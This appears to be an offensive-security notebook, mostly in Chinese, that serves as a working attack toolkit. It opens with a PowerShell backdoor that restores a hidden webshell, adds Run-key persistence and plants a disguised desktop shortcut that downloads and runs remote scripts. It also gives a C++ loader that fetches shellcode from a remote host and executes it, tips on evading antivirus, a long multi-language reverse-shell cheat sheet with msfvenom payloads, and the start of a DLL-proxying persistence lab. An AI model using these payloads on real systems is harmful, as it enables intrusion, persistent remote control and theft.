    Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName
    New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}

$shell_path = "G:\xampp\htdocs\backdoor\shell.php"
$shell_content = [System.IO.File]::ReadAllBytes($shell_path)
while($true){
    $flag = Test-Path $shell_path
    if($flag -eq "True"){ sleep 1 }
    else{
        [System.IO.File]::WriteAllBytes($shell_path, $shell_content)
        $shell = Get-Item $shell_path
        $shell.Attributes = "Readonly","system","notcontentindexed","hidden","archive"
        sleep 1
    }
}

powershell.exe -nop -windowstyle hidden -exec bypass -c &quot;IEX (New-Object Net.WebClient).DownloadString(&#39;https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1&#39;);Backd00r-webshell.ps1&quot;



Function LNK_backdoor{
    $Command = "powershell.exe -nop -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell-Auto.ps1 ');Backd00r-webshell-Auto.ps1 """
    ##HIDE Computer Icon
    $ErrorActionPreference = "SilentlyContinue"
    If ($Error) {$Error.Clear()}
    $RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
    If (Test-Path $RegistryPath) {
        $Res = Get-ItemProperty -Path $RegistryPath -Name "HideIcons"
        If (-Not($Res)) {
            New-ItemProperty -Path $RegistryPath -Name "HideIcons" -Value "0" -PropertyType DWORD -Force | Out-Null
        }
        $Check = (Get-ItemProperty -Path $RegistryPath -Name "HideIcons").HideIcons
        If ($Check -NE 0) {
            New-ItemProperty -Path $RegistryPath -Name "HideIcons" -Value "0" -PropertyType DWORD -Force | Out-Null
        }
    }
    $RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons"
    If (-Not(Test-Path $RegistryPath)) {
        New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "HideDesktopIcons" -Force | Out-Null
        New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons" -Name "NewStartPanel" -Force | Out-Null
    }
    $RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel"
    If (-Not(Test-Path $RegistryPath)) {
        New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons" -Name "NewStartPanel" -Force | Out-Null
    }
    If (Test-Path $RegistryPath) {
    ## -- My Computer
        $Res = Get-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
        If (-Not($Res)) {
            New-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value "1" -PropertyType DWORD -Force | Out-Null
        }
        $Check = (Get-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}")."{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
        If ($Check -NE 1) {
            New-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value "1" -PropertyType DWORD -Force | Out-Null
        }
    }
    If ($Error) {$Error.Clear()}
    ##SHOW Computer Icon
    #set-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu' -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value 0
    #set-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel' -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value 0
    #RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True
    $Commandline = "/c explorer.exe /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | "
    $Command = $Commandline + $Command
    $get_path=New-Object -ComObject WScript.Shell; 
    $path = $get_path.SpecialFolders.Item('Desktop')
    $WshShell = New-Object -comObject WScript.Shell
    $My_Computer = 17
    $Shell = new-object -comobject shell.application
    $NSComputer = $Shell.Namespace($My_Computer)
    $name = $NSComputer.self.name
    $Shortcut = $WshShell.CreateShortcut($path+"\"+$name+".lnk")
    $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
    $Shortcut.WindowStyle = 7
    $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,15"
    $Shortcut.Arguments = '                                                                                                                                                                                                                                      '+ $Command
    $Shortcut.Save()
    refresh
}
Function refresh{
   $source = @"
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
namespace FileEncryptProject.Algorithm
{
  public class DesktopRefurbish
  {
    [DllImport("shell32.dll")]
    public static extern void SHChangeNotify(HChangeNotifyEventID wEventId, HChangeNotifyFlags uFlags, IntPtr dwItem1, IntPtr dwItem2);
    public static void DeskRef()
    {
      SHChangeNotify(HChangeNotifyEventID.SHCNE_ASSOCCHANGED, HChangeNotifyFlags.SHCNF_IDLIST, IntPtr.Zero, IntPtr.Zero);
    }
  }
  #region public enum HChangeNotifyFlags
  [Flags]
  public enum HChangeNotifyFlags
  {
    SHCNF_DWORD = 0x0003,
    SHCNF_IDLIST = 0x0000,
    SHCNF_PATHA = 0x0001,
    SHCNF_PATHW = 0x0005,
    SHCNF_PRINTERA = 0x0002,
    SHCNF_PRINTERW = 0x0006,
    SHCNF_FLUSH = 0x1000,
    SHCNF_FLUSHNOWAIT = 0x2000
  }
  #endregion//enum HChangeNotifyFlags
  #region enum HChangeNotifyEventID
  [Flags]
  public enum HChangeNotifyEventID
  {
    SHCNE_ALLEVENTS = 0x7FFFFFFF,
    SHCNE_ASSOCCHANGED = 0x08000000,
    SHCNE_ATTRIBUTES = 0x00000800,
    SHCNE_CREATE = 0x00000002,
    SHCNE_DELETE = 0x00000004,
    SHCNE_DRIVEADD = 0x00000100,
    SHCNE_DRIVEADDGUI = 0x00010000,
    SHCNE_DRIVEREMOVED = 0x00000080,
    SHCNE_EXTENDED_EVENT = 0x04000000,
    SHCNE_FREESPACE = 0x00040000,
    SHCNE_MEDIAINSERTED = 0x00000020,
    SHCNE_MEDIAREMOVED = 0x00000040,
    SHCNE_MKDIR = 0x00000008,
    SHCNE_NETSHARE = 0x00000200,
    SHCNE_NETUNSHARE = 0x00000400,
    SHCNE_RENAMEFOLDER = 0x00020000,
    SHCNE_RENAMEITEM = 0x00000001,
    SHCNE_RMDIR = 0x00000010,
    SHCNE_SERVERDISCONNECT = 0x00004000,
    SHCNE_UPDATEDIR = 0x00001000,
    SHCNE_UPDATEIMAGE = 0x00008000,
  }
  #endregion
}
"@
     Add-Type -TypeDefinition $source
    [FileEncryptProject.Algorithm.DesktopRefurbish]::DeskRef()
}
LNK_backdoor
```


# JSPWebshell免杀

## 0x01免杀介绍

根据我的测试，在百度或其他查杀webshell工具，jspwebshell并没有有效的查杀，这个我留做给我自己的作业，算作是webshell攻防课题之一。

同时留下我实验用到的webshell

{% embed url="<https://github.com/fa1c0n1/MyJSPWebshell>" %}


# ASPWebshell免杀

## 0x01通用方法

这边无论是php，jsp，asp。通用的方法是类(函数)混淆，把执行函数写在类中，然后带入传参。

如果还是不行的话，就把函数和参数都卸载类中。

通常这种混淆的方法是通杀的。

## 0x02参考文章

#### [asp-Webshell免杀](https://blog.csdn.net/weixin_44110913/article/details/108184784)

#### [Deformity ASP/ASPX Webshell、Webshell Hidden Learning](https://www.cnblogs.com/LittleHann/p/5016999.html)


# Fuzzing-Dicts

{% embed url="<https://github.com/TheKingOfDuck/fuzzDicts>" %}

{% embed url="<https://github.com/gh0stkey/Web-Fuzzing-Box>" %}


# Webshell

Webshell全部收集与网络

{% embed url="<https://github.com/tennc/webshell>" %}


# 一句话&&小马

详情见各个菜刀生成


# 大马

来源于github最高星

{% embed url="<https://github.com/tennc/webshell>" %}


# AV探测

{% embed url="<https://github.com/gh0stkey/avList>" %}


# 免杀


# PowerShell混淆

{% embed url="<https://github.com/danielbohannon/Invoke-Obfuscation>" %}


# Shellcode混淆

{% embed url="<https://github.com/kgretzky/python-x86-obfuscator>" %}


# 免杀技巧

## 远程加载shellcode

```
#include <string>
#include <iostream>
#include <windows.h>
#include <winhttp.h> 
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
void main()
{
    //最小化
    HWND my_consle = GetForegroundWindow();
    ShowWindow(my_consle, SW_MINIMIZE);

    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer = NULL;
    HINTERNET  hSession = NULL,
               hConnect = NULL,
               hRequest = NULL;
    BOOL  bResults = FALSE;
    hSession=WinHttpOpen(L"User Agent",WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,WINHTTP_NO_PROXY_NAME,WINHTTP_NO_PROXY_BYPASS,0);
    if(hSession)
    {
        hConnect=WinHttpConnect(hSession,L"www.hacker.wang",INTERNET_DEFAULT_HTTP_PORT,0);
    }
    if(hConnect)
    {
        hRequest=WinHttpOpenRequest(hConnect, L"GET",L"/vc/cs.txt",L"HTTP/1.1", WINHTTP_NO_REFERER,WINHTTP_DEFAULT_ACCEPT_TYPES,0);
    }
    if(hRequest)
    {
        bResults=WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS, 0,WINHTTP_NO_REQUEST_DATA, 0, 0, 0 );
    }
    if(bResults)
    {
        bResults=WinHttpReceiveResponse(hRequest,NULL);
    }
    if(bResults)
    {
        do
        {
            // Check for available data.
             dwSize = 0;
             if (!WinHttpQueryDataAvailable( hRequest, &dwSize))
             {
                 printf( "Error %u in WinHttpQueryDataAvailable.\n",GetLastError());
                 break;
             }
             if (!dwSize)
                 break;
              pszOutBuffer = new char[dwSize+1];
              if (!pszOutBuffer)
              {
                   printf("Out of memory\n");
                break;
              }
               ZeroMemory(pszOutBuffer, dwSize+1);
               if (!WinHttpReadData( hRequest, (LPVOID)pszOutBuffer,  dwSize, &dwDownloaded))
               {
                     printf( "Error %u in WinHttpReadData.\n", GetLastError());
               }
               else
               {
                   printf("%s", pszOutBuffer);
               }
                //编写shellcode 开始
                const char* ShellCode = pszOutBuffer;
                int shellcode_length = strlen(ShellCode);

                unsigned char* value = (unsigned char*)calloc(shellcode_length/2,sizeof(unsigned char));
                for (size_t count=0;count < shellcode_length /2;count++)
                {
                    sscanf(ShellCode,"%2hhx",&value[count]);
                    ShellCode += 2;
                }
                
                void *exec = VirtualAlloc(0,shellcode_length/2,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
                memcpy(exec,value,shellcode_length/2);

                printf("%s", exec);
                ((void(*)())exec)();

               // 编写shellcode 结束


               delete [] pszOutBuffer;
               if (!dwDownloaded)
                   break;
        } while (dwSize > 0);
    }
    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);
    system("pause");
}
```

远程 shellcode 文件<https://www.iredteam.cn/1.txt>


# 免杀综合

{% embed url="<https://github.com/TideSec/BypassAntiVirus>" %}


# 权限提升


# 提权辅助

{% embed url="<https://github.com/gh0stkey/peAssist>" %}

{% embed url="<https://github.com/mzet-/linux-exploit-suggester>" %}


# Bypass AV


# Linux提权


# Windows提权


# 第三方提权


# 单域信息收集


# 密码抓取

先引用一下哈，有时间会自己写出来

{% embed url="<https://www.ired.team/offensive-security/credential-access-and-credential-dumping>" %}


# C2上线&&反弹Shell


# C2上线姿势合集


# 反弹shell的总结

更多请看工具篇--->代理工具&&国外

## Bash TCP:

Victim:

```
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
```

```
/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1
```

```
exec 5<>/dev/tcp/127.0.0.1/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
```

```
exec /bin/sh 0</dev/tcp/127.0.0.1/8080 1>&0 2>&0
```

```
0<&196;exec 196<>/dev/tcp/127.0.0.1/8080; sh <&196 >&196 2>&196
```

## Bash UDP:

Victim:

```
sh -i >& /dev/udp/127.0.0.1/8080 0>&1
```

Listener:

```
nc -u -lvp 8080
```

## Netcat:

```
nc -e /bin/sh 127.0.0.1 8080
```

```
nc -e /bin/bash 127.0.0.1 8080
```

```
nc -c bash 127.0.0.1 8080
```

```
mknod backpipe p && nc 127.0.0.1 8080 0<backpipe | /bin/bash 1>backpipe 
```

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 8080 >/tmp/f
```

```
rm -f /tmp/p; mknod /tmp/p p && nc 127.0.0.1 8080 0/tmp/p 2>&1
```

```
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 127.0.0.1 8080 > f
```

```
rm -f x; mknod x p && nc 127.0.0.1 8080 0<x | /bin/bash 1>x
```

## Ncat:

```
ncat 127.0.0.1 8080 -e /bin/bash
```

```
ncat --udp 127.0.0.1 8080 -e /bin/bash
```

## Telnet:

```
rm -f /tmp/p; mknod /tmp/p p && telnet 127.0.0.1 8080 0/tmp/p 2>&1
```

```
telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 444
```

```
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 127.0.0.1 8080 > f
```

```
rm -f x; mknod x p && telnet 127.0.0.1 8080 0<x | /bin/bash 1>x
```

## Socat:

Victim:

```
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:8080
```

```
socat tcp-connect:127.0.0.1:8080 exec:"bash -li",pty,stderr,setsid,sigint,sane
```

Listener:

```
socat file:`tty`,raw,echo=0 TCP-L:8080

```

Victim:

```
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:8080
```

## Perl:

Victim:

```
perl -e 'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

```
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

Windows only, Victim:

```
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

## Python:

IP v4

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

```
export RHOST="127.0.0.1";export RPORT=8080;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

Copy IP v6

```
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",8080,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```

Copy Windows only:

```
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('127.0.0.1', 8080)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```

## PHP:

```
php -r '$sock=fsockopen("127.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
```

```
php -r '$s=fsockopen("127.0.0.1",8080);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);'
```

```
php -r '$s=fsockopen("127.0.0.1",8080);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
```

```
php -r '$s=fsockopen("127.0.0.1",8080);`/bin/sh -i <&3 >&3 2>&3`;'
```

```
php -r '$s=fsockopen("127.0.0.1",8080);system("/bin/sh -i <&3 >&3 2>&3");'
```

```
php -r '$s=fsockopen("127.0.0.1",8080);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
```

## Ruby:

```
ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

```
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```

NOTE: Windows only

```
ruby -rsocket -e 'c=TCPSocket.new("127.0.0.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```

## OpenSSL:

Attacker:

```
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```

```
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
```

Copy or

```
ncat --ssl -vv -l -p 8080
```

Copy Victim:

```
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:8080 > /tmp/s; rm /tmp/s
```

## Powershell:

```
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

```
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
```

## Awk:

```
awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```

## TCLsh

```
echo 'set s [socket 127.0.0.1 8080];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
```

## Java:

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/127.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

```
String host="127.0.0.1";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

```
Thread thread = new Thread(){
    public void run(){
        // Reverse shell here
    }
}
thread.start();
```

## War:

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
```

## Lua:

Linux only

```
lua -e "require('socket');require('os');t=socket.tcp();t:connect('127.0.0.1','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"

```

Windows and Linux

```
lua5.1 -e 'local host, port = "127.0.0.1", 8080 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```

NodeJS:

```
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "127.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();
```

```
require('child_process').exec('nc -e /bin/sh 127.0.0.1 8080')
```

```
-var x = global.process.mainModule.require
-x('child_process').exec('nc 127.0.0.1 8080 -e /bin/bash')
```

```
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```

## Groovy:

```
String host="127.0.0.1";
int port=8080;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

## Meterpreter Shell:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe
```

```
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe
```

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f elf >reverse.elf
```

```
msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f elf >reverse.elf
```

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="127.0.0.1" LPORT=8080 -f elf > shell.elf
```

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST="127.0.0.1" LPORT=8080 -f exe > shell.exe
```

```
msfvenom -p osx/x86/shell_reverse_tcp LHOST="127.0.0.1" LPORT=8080 -f macho > shell.macho
```

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST="127.0.0.1" LPORT=8080 -f asp > shell.asp
```

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST="127.0.0.1" LPORT=8080 -f raw > shell.jsp
```

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST="127.0.0.1" LPORT=8080 -f war > shell.war
```

```
msfvenom -p cmd/unix/reverse_python LHOST="127.0.0.1" LPORT=8080 -f raw > shell.py
```

```
msfvenom -p cmd/unix/reverse_bash LHOST="127.0.0.1" LPORT=8080 -f raw > shell.sh
```

```
msfvenom -p cmd/unix/reverse_perl LHOST="127.0.0.1" LPORT=8080 -f raw > shell.pl
```

## Xterm:

```
xterm -display 127.0.0.1:1
Xnest :1
xhost +targetip
```


# 持久化控制


# DLL Proxying for Persistence

This is a quick lab to get familiar with a technique that's been on my todo list for some time - DLL proxying. This technique could be used for persistence or to intercept data, but in this lab, I am only concerned with persistence.

## Overview

In the context of malware, DLL proxying is a DLL hijacking technique, where a legitimate DLL say, `legit.dll` is renamed to `legit1.dll` and a malicious dll, which exports **all** the same functions that the `legit1.dll` exports, is placed instead of `legit.dll`.

Once the dll is hijacked, whenever a program calls a function, say `exportedFunction1` from `legit.dll`, here is what happens:

* `legit.dll` gets loaded into the calling process and executes its malicious code, say reaches out to the C2
* `legit.dll` forwards the call to `exportedFunction1` in `legit1.dll`
* `legit1.dll` executes the `exportedFunction1`

This function forwarding from one DLL to another is what gives the technique its name - DLL proxying, since the malicious DLL is sitting in between the application calling the exported function and a legitimate DLL that implements that exported function.

At a high-level, below diagram shows how it all looks before and after the DLL is hijacked:

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUcLmB_ZgW8toaipc3g%2F-MUcNcDQJniV--UyN5Yw%2Fimage%20\(745\).png?alt=media\&token=04a94715-fdd0-4109-99db-3a9814f75014)

## Walkthrough

At a high level, the technique works as follows:

1. Decide on which DLL to hijack. Let's say, it's located in c:\temp\legit.dll. Move it to c:\temp\legit1.dll
2. Get a list of all the exported functions of c:\temp\legit1.dll
3. Create a malicious DLL malicious.dll, that once loaded by the target process, executes your payload
4. Inside the malicious.dll, redirect/forward **all** the exported functions by legit.dll (this is the DLL we are hijacking) to legit1.dll (this is still the same DLL we are hijacking, just with a new name)&#x20;
5. Copy malicious.dll to c:\temp\legit.dll
6. At this point, any program that calls an **any** exported function in legit.dll will now execute your malicious payload and then transfer the execution to the same exported function in c:\temp\legit1.dll.

### Target DLL

For demo purposes, we will create our own DLL legitimate DLL to be hijacked, called `legit.dll`:

{% tabs %}
{% tab title="legit-dll.cpp" %}

```cpp
#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

extern "C" __declspec(dllexport) VOID exportedFunction1(int a)
{
    MessageBoxA(NULL, "Hi from legit exportedFunction1", "Hi from legit exportedFunction1", 0);
}

extern "C" __declspec(dllexport) VOID exportedFunction2(int a)
{
    MessageBoxA(NULL, "Hi from legit exportedFunction2", "Hi from legit exportedFunction2", 0);
}

extern "C" __declspec(dllexport) VOID exportedFunction3(int a)
{
    MessageBoxA(NULL, "Hi from legit exportedFunction3", "Hi from legit exportedFunction3", 0);
}
```

{% endtab %}
{% endtabs %}

Let's say we've now compiled the above as a `legit.dll` to `c:\temp\legit.dll`. It has 3 exported functions as shown below:

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUcLmB_ZgW8toaipc3g%2F-MUcNt4WBA_CeVjWH3h1%2Fimage%20\(638\).png?alt=media\&token=c32ce321-f1c2-4333-b98a-0644563cff04)

To confirm the DLL works, we can see that calling `exportedFunction1` from inside the `legit.dll` gives a popup like this:

```
rundll32 c:\temp\legit.dll,exportedFunction1
```

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUcLmB_ZgW8toaipc3g%2F-MUcO7fcCbYUPTd3RcL1%2Fimage%20\(631\).png?alt=media\&token=6e6e9dd4-f5f6-4539-a920-d902a6177a26)

We now have the `legit.dll` and its target function `exportedFunction1` to hijack, let's move on to the malicious DLL that will do the function proxying.

### Malicious DLL

Let's now create the `malicious.dll` - we will be using it to hijack programs that call functions from `c:\temp\legit.dll`. Compile the below as a `malicious.dll`:

{% tabs %}
{% tab title="malicious-dll.cpp" %}

```cpp
#include "pch.h"

